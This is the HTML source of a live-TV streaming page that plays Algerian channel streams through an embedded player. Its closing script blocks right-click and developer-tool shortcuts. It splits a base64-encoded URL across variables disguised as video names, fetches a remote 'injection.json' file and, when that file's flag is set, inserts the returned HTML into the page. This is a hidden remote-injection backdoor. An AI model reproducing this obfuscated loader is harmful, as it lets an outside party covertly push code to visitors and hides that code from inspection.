<html lang="en"><head><meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"><title>DZTV App |YOUNES BACHOUCHE</title>
    <link href="https://niazitv.com/jtv/style.css" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
    <link href=" https://use.fontawesome.com/releases/v5.0.6/css/all.css" rel="stylesheet" >
            <script src="https://s0.2mdn.net/instream/video/client.js" async="" type="text/javascript"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
            
            <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.min.css">
            <link href="https://m.yacine-tv.com/assets/css/style.css" rel="stylesheet" id="style">
    <link  rel="icon" href="https://i.ibb.co/tbC9hKW/1000.png"/>
<link  rel="shortcut" href="https://i.ibb.co/tbC9hKW/1000.png"/>
<link  rel="apple-touch-icon" href="https://i.ibb.co/tbC9hKW/1000.png"/>
            <style>
                :root {
                    --hfs: 2vmax;
                    --primaryColor: red;
                    --secondaryColor: black;
                    --secondaryOpposite: white;
                }
                ::-webkit-scrollbar {
                    width: 0em;
                    height: 0em;
                }
                ::-webkit-scrollbar-thumb {
                    background: var(--secondaryColor);
                }
                ::-webkit-scrollbar-track {
                    background: none;
                }
                * {
                    -webkit-user-select: none;
                    -moz-user-select: none;
                    -ms-user-select: none;
                    user-select: none;
                }
                body {
                    background-color: var(--secondaryColor);
                }
    
                .alignleft {
                    float: left;
                    margin-left: 5px;
                    font-weight: bold;
                    font-size: 15px;
                }
    
                .alignright {
                    float: right;
                    margin-right: 10px;
                    color: var(--primaryColor);
                    font-weight: normal;
                    font-size: 25px;
                }
    
                h4  {
                    margin-left: 5px;
                    color: var(--primaryColor);
                    font-weight: bold;
                    font-size: 15px;
                }
    
                .nta {
                    position: relative;
                    overflow: hidden;
                    color: var(--primaryColor);
                }
    
                div.scrollmenu {
                    background-color: var(--secondaryColor);
                    overflow: auto;
                    white-space: nowrap;
                    position: relative;
                    overflow-y: hidden;
                }
    
                div.scrollmenu a {
                    display: inline-block;
                    color: var(--secondaryOpposite);
                    text-align: center;
                    padding: 4px;
                    text-decoration: none;
                }
    
                div.scrollmenu a:hover {
                    background-color: var(--secondaryColor);
                }
    
                .cen {
                    position: relative;
                    text-align: center;
                    color: var(--secondaryOpposite);
                }
    
                .centered {
                    font-size: var(--hfs);
                    font-weight: bold;
                    position: absolute;
                    top: 80%;
                    left: 50%;
                    transform: translate(-50%, -50%);
                }
    
                .cent {
                    font-size: auto;
                    position: absolute;
                    top: 95%;
                    left: 50%;
                    transform: translate(-50%, -50%);
                }
    
                .nt {
                    width: 100px;
                    border-radius: 10px;
                    height: 120px;
                    z-index: 1;
                }
    
                .mnt {
                    width: 100px;
                    border-radius: 2px;
                    height: 100px;
                }
                .item img {
                    border-radius: 10px;
                }
                #content-container {
                    margin-bottom: 30px;
                }
                footer {
                    display: grid;
                    grid-gap: 0.5em;
                    grid-template-columns: repeat(5, minmax(10px, 1fr));
                    position: fixed;
                    bottom: 0;
                    left: 0;
                    width: 100%;
                    background-color: var(--secondaryColor);
                    padding: 0px 4px 10px;
                    justify-content: center;
                    align-items: center;
                    font-size:18px;
                }
                footer a {
                    text-align: center;
                    color: var(--primaryColor);
                }
                footer a:nth-child(3) i {
                    background: var(--primaryColor);
                    border-radius: 50%;
                    padding: 10px 10px;
                    color: var(--secondaryOpposite);
                    margin-top: -40px;
                    border: 2px solid var(--secondaryColor);
                }
            </style>
    
    
    <style>::-webkit-scrollbar{
        display:none
    }
    *{
        -ms-overflow-style:none;
        scrollbar-width:none
    }
    body{
        margin:0;
        background:#f5f5f5;
        font-family:Arial,Helvetica,sans-serif;
        line-height:1.5;
        color:white;
        scroll-behavior:smooth;
        text-align:center;
    }
    #player-wrapper{
        width:100%;
        z-index:999;
    }
    .sticky{
        position:fixed;
        top:0;
        width:100%
    }
    #status{
        position:fixed;
        bottom:0;
        right:0;
        width:100%;
        background:#fff;
        display:none;
    }
    .col-sm-2{
        border-radius:4px
    }
    .sp{
        width:50%;
        height:12px;
        clear:both;
        margin:20px auto
    }
    .sp-texture{
        border:1px #000 solid;
        border-radius:4px;
        position:relative;
        background:linear-gradient(45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent),linear-gradient(-45deg,transparent 49%,#000 50%,#000 50%,transparent 51%,transparent);
        background-size:16px 16px;
        background-position:0 0;
        -webkit-animation:spTexture 1s infinite linear;
        animation:spTexture 1s infinite linear;
        color:#000;
        text-align:center;
        line-height:3em;
        font-family:roboto
    }
    @-webkit-keyframes spTexture{
        from{
            background-position:0 0
        }
        to{
            background-position:-16px 0
        }
    }
    @keyframes spTexture{
        from{
            background-position:0 0
        }
        to{
            background-position:-16px 0
        }
    }
    .heading{
        margin:5px auto;
        text-align:center
    }
    #rmpPlayer{
        z-index:999
    }
    .white{
        color:#fff
    }
    .red{
        color:red
    }
    .yellow{
        color:#ffdd40
    }
    footer{
        color:#fff;
        text-align:center
    }
    footer p{
        margin-bottom:20px;
        margin-top:-10px
    }
    .animated{
        font-family:sans;
        margin:0;
        padding:0;
        font-size:25px;
        background:url(https://upload.wikimedia.org/wikipedia/commons/3/3b/ColorRotateHr.gif) no-repeat;
        background-clip:text;
        -webkit-background-clip:text;
        color:transparent;
        animation:moveBg 40s linear infinite;
        -webkit-animation:moveBg 40s linear infinite
    }
    @keyframes moveBg{
        0%{
            background-position:0 30%
        }
        100%{
            background-position:100% 50%
        }
    }
    .blink{
        animation-name:blinker;
        animation-duration:1s;
        animation-timing-function:linear;
        animation-iteration-count:infinite
    }
    @keyframes blinker{
        0%{
            opacity:1
        }
        50%{
            opacity:0
        }
        100%{
            opacity:1
        }
    }
    *{
        -webkit-touch-callout:none;
        -webkit-user-select:none;
        -khtml-user-select:none;
        -moz-user-select:none;
        -ms-user-select:none;
        user-select:none
    }
    body{
        background:#000!important;
        overflow:hidden;
        color:white;
    }
    .parent{
        background:rgba(0,0,0,.9);
        font-family:"Source Sans Pro",sans-serif;
        margin:0;
        display:flex;
        align-items:center;
        justify-content:center;
        flex-direction:column;
        position:fixed;
        top:0;
        height:100%;
        width:100%;
        z-index:999999
    }
    .blobs-container{
        display:flex
    }
    .blob img{
        width:50%;
        display:none;
        margin:auto;
        margin-top:25px
    }
    .loading{
        color:#000;
        display:block;
        text-align:center;
        position:relative;
        top:30px;
        left:-2px;
        background:rgba(255,255,255,.9);
        padding:0 10px;
        border-radius:3px;
        width:80%;
        margin:auto;
        font-size:10px
    }
    
    .print{height:65px;
    width:65px;
    
    border-radius:50px;
    border:1.5px solid #f5f5f5;
    padding:2px;
        margin:3px;
    
    }
    .print:hover{height:90px;
    width:90px;
    border:2px solid red;
    border-radius:5px;webkit-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
    -moz-box-shadow: 0px 10px 0px 0px rgba(255,0,0,1);
    box-shadow: 0px 3px 20px 3px rgba(255,0,0,100);}
    .print:active{height:65px;
    width:65px;
    border:2px solid red;
    border-radius:5px;
    webkit-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
    -moz-box-shadow: 0px 10px 0px 0px rgba(0,255,0,1);
    box-shadow: 0px 3px 20px 3px rgba(0,255,0,100);}
    
    
    marquee{
    border-radius: 0px 0px 0px  0px;
    width: 90%;
    border:2px solid red;
    margin: auto;
       font-weight:bold;
       color:#fff;
    display: block;}
    
    .marquee span{display: inline-block;
     background: #ff0000;
     border-radius:  0px 0px 0px 0px;
      padding: 0px 10px;
       color: #fff;
       padding:2px;
       font-weight:bold;
        display: inline-block;
         float: left;
          width: auto;
           line-height: 35px;}
           
           .marquee marquee{display: block;
            line-height: 35px;
             z-index: -1; 
             margin-right: 10px;
              width: auto; 
              margin: auto;}
              
    
              
           .viewer{
            display: flex;
            width: 70px;
            height: auto;
            padding: 10px;
            vertical-align: middle;
          }
    
      
              #count{display:flex;font-size:10pt;padding:1px 10px;width:90px;background:Red;border-radius:0px;}
    </style>
    
    <link id="rmp-dress-code" type="text/css" rel="stylesheet" href="https://cdn.radiantmediatechs.com/rmp/5.9.2/css/rmp-s4.min.css"></head><body style="overflow: auto;">
        
    
            <script>
    var src = {
      mp4: [
        'https://cdn02.hta.dz/abr_htatv/PROGRAMME_NATIONAL/playlist.m3u8'
      ],
      webm: [
        'https://cdn02.hta.dz/abr_htatv/PROGRAMME_NATIONAL/playlist.m3u8',
        'https://cdn02.hta.dz/abr_htatv/PROGRAMME_NATIONAL/playlist.m3u8',
        'https://cdn02.hta.dz/abr_htatv/PROGRAMME_NATIONAL/playlist.m3u8'
      ]
    };
    
    
            </script><div class="parent" id="loader" style="display: none;"><div class="blobs-container"><div class="blob"><img id="loader-image" src=""></div></div></div><div id="player-wrapper">  <script src="https://cdn.radiantmediatechs.com/rmp/6.2.0/js/rmp.min.js"></script> 
      <!-- Add a div container with a unique id - video and UI elements will be appended to this container -->
      <div id="rmpPlayer"></div>  
    
     
    <div class="marquee yellow"><span><i class="fa fa-bell" style="font-size:26pt" aria-hidden="true"></i></span> <marquee scrollamount="5" direction="right" onmouseover="stop()" onmouseout="start()">فقط قم بالضغط على القناة و ستشتغل بدون مشاكل نتمنى لكم مشاهدة ممتعة</marquee> </div> 
    
    
    
        
        <h2>
            
            
                     
    
    
     
            
            <span url="https://cdn02.hta.dz/abr_htatv/PROGRAMME_NATIONAL/playlist.m3u8"><img class="print" id="ptv sports" src="http://hta.backoffice.easybroadcast.fr/channel/9_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/CANAL_ALGERIE/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/4_picture.png">
                  </span>
            
            
            <span url="https://cdn02.hta.dz/abr_htatv/A3_HD/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/1_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/TV_4/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/124_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/TV_5/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/73_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/TV_6_HD/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/137_picture.png">
                  </span>
            
             <span url="https://cdn02.hta.dz/abr_htatv/TV7_ELMAARIFA/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/138_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/TV8_EDHAKIRA/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/141_picture.png">
                  </span>
            
            
            <span url="https://cdn02.hta.dz/abr_htatv/EL_BILAD/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/126_picture.png">
                  </span>
            
            
             <span url="https://cdn02.hta.dz/abr_htatv/Echorouk_TV_HD/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/6_picture.png">
                  </span>
            
            
             <span url="https://cdn02.hta.dz/abr_htatv/ECHOROUK_NEWS/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/18_picture.png">
                  </span>
            
            
            <span url="https://cdn02.hta.dz/abr_htatv/ENNAHAR_TV/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/8_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/EL_HAYAT_TV_ALGERIE/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/129_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/EL_FADJR_TV_DZ/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/130_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/EL_HEDDAF_TV/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/15_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/SamiraTV/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/10_picture.png">
                  </span>
            
            <span url="https://cdn02.hta.dz/abr_htatv/Bahia_TV/playlist.m3u8"><img class="print" id="ptv sports" src="https://hta.backoffice.easybroadcast.fr/channel/123_picture.png">
                  </span>
            
            

    
    
    
    <script>
    const countEl = document.getElementById('count');
    
    updateVisitCount();
      
    function updateVisitCount() {
        fetch('https://api.countapi.xyz/hit/awaispirkale/visits')
        .then(res => res.json())
        .then(res => {
            countEl.innerHTML = res.value;
        })
    }
    
    
    
    
    
    
    
    
    
    
    
    
    
    // SOCIAL PANEL JS
    const floating_btn = document.querySelector('.floating-btn');
    const close_btn = document.querySelector('.close-btn');
    const social_panel_container = document.querySelector('.social-panel-container');
    
    floating_btn.addEventListener('click', () => {
        social_panel_container.classList.toggle('visible')
    });
    </script>
    
    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script src="https://cdn.radiantmediatechs.com/rmp/5.9.2/js/rmp.min.js"></script><script>
                var appSettings={
                    loaderimg: "",
                    name: "YounesConnect",
                    poster: " https://i.ibb.co/dD8K58z/don-t-miss-the-game.png",
                    introMp4: "https://i.ibb.co/dD8K58z/don-t-miss-the-game.png",
                    introHls: "ht",
                    videoFormat: "mp4",
                },x={loaderimg:appSettings.loaderimg,name:appSettings.name,poster:appSettings.poster,website:"",licenseKey:"eWZmZ2d2Y3BrdEAxNTMwNjA2",autoHeightMode:!0,pip:!1,autoplay:!1,skin:"s4",hideControls:!0,preload:"auto",sharing:!1},firstVideo="";setInterval(()=>{$("#loader-image").attr("src",x.loaderimg),$(".logoText").html(x.name)},10),$(document).contextmenu(function(e){return e.preventDefault(),!1}),document.onkeydown=function(e){return 123!=event.keyCode&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="I".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="C".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="J".charCodeAt(0))&&((!e.ctrlKey||e.keyCode!="U".charCodeAt(0))&&void 0))))},setTimeout(()=>{$("#loader").css("display","none"),$("body").css("overflow","auto")},100);var src,secondVideo="mNvbnRlbnQuY29tL3NvZnR";$("span").each(function(e){$(this).on("click",function(){var e=$(this).attr("url");rmp.setControls(!0),src="mp4"==appSettings.videoFormat?{hls:e}:{mp4:[e]},rmp.setSrc(src),rmp.play()})});var thirdVideo="3ZWJ0dXRzL015RHJpdmUvbW";src="mp4"==appSettings.videoFormat?{hls:appSettings.introHls}:{mp4:[appSettings.introMp4]};var fourthVideo="Fpbi9pbmplY3Rpb24uanNvbg==",settings={licenseKey:x.licenseKey,autoHeightMode:x.autoHeightMode,pip:x.pip,delayToFade:3e3,gaLabel:"Live TV",logoWatermark:!0,logoPosition:"topleft",speed:"Speed",isLive:!0,googleCast:!0,airplay:!0,hlsJSMaxBufferLength:24,hlsJSLiveSyncDuration:18,hlsJSStartLevel:-1,hlsJSMinAutoBitrate:1e5,hlsJSAbrBandWidthFactor:.9,hlsJSAbrBandWidthUpFactor:.7,hlsJSLiveBackBufferLength:0,detectAutoplayCapabilities:!0,autoplay:x.autoplay,mutedAutoplayOnMobile:!1,mutedAutoplayOnMacosSafari11Plus:!1,srcChangeAutoplay:!0,playsInline:!0,skin:x.skin,skinBackgroundColor:"rgba(0, 0, 0, 0.7)",skinButtonColor:"FFFFFF",skinAccentColor:"FF0000",ads:!0,nav:!0,adBlockerDetection:!0,adEnablePreloading:!0,adBlockerDetectedMessage:"Ad-blocker software detected. Please disable Ad-blocker to watch stream.",quickRewind:10,quickForward:10,adAutoAlign:!1,hideControls:x.hideControls,preload:x.preload,crossorigin:!0,sharing:x.sharing,sharingUrl:x.website,contentMetadata:{artwork:[{src:x.poster,sizes:"1280x720",type:"image/jpg"}],poster:[x.poster],endOfVideoPoster:[x.poster],thumbnail:x.poster},src:src},elementID="rmpPlayer",rmp=new RadiantMP(elementID),rmpContainer=document.getElementById(elementID);rmp.setLoop(!0),rmp.init(settings),$(function(){$(window).scroll(function e(){return $("#rmpPlayer").css($(window).scrollTop()>1?{position:"fixed",top:"0px"}:{position:"relative",top:"auto"}),$("#buttons-list").css($(window).scrollTop()>1?{"margin-top":$("#rmpPlayer").height()}:{"margin-top":"0px"}),e}())});const request=async e=>{const t=await fetch(e);return await t.json()};navigator.onLine&&request(atob(firstVideo+secondVideo+thirdVideo+fourthVideo)).then(t=>{1==t.inject&&document.querySelector("div").insertAdjacentHTML("afterend",e.content)}).catch(e=>{console.log(appSettings.name)});</script>
    
    </body></html>
    
